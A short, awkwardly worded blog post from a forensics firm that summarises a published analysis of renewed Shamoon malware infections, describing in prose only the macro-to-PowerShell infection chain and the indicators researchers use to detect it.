Get Help Now
    24/7 Support

    Hunting of new Shamoon infections

    Christian Beek published an article “Analysis of new Shamoon infections”. Shamoon – a malaware that appears to come back to the stage after a four-malware holiday. Shamoon was originally discovered about four years ago as a result of the attacks against the Saudi Aramco oil company. His intention was to destroy thousands of computers.

     

    The article Christiaan Beek made Shamoon analysis. He demonstrated how the infection of the target PC. The computer owner will receive an email with an attached document. When you try to open a document starts macroscript that runs PowerShell script by which the target computer to download malicious software. The article shows the fragments PowerShell script, specify a location within the computer’s memory where the system and writes a temporary file. In addition, all as shown in File locations & file names that allow the researcher to identify that the computer been just such an attack. Also, the author of the article indicated Interesting strings in code-samples that can be used to identify and PowerShell script.

     

    More.



    DISCLAIMER: THIS POST IS FOR INFORMATIONAL PURPOSES ONLY AND IS NOT TO BE CONSIDERED LEGAL ADVICE ON ANY SUBJECT MATTER. DIGITAL FORENSICS CORP. IS NOT A LAWFIRM AND DOES NOT PROVIDE LEGAL ADVICE OR SERVICES. By viewing posts, the reader understands there is no attorney-client relationship, the post should not be used as a substitute for legal advice from a licensed professional attorney, and readers are urged to consult their own legal counsel on any specific legal questions concerning a specific situation.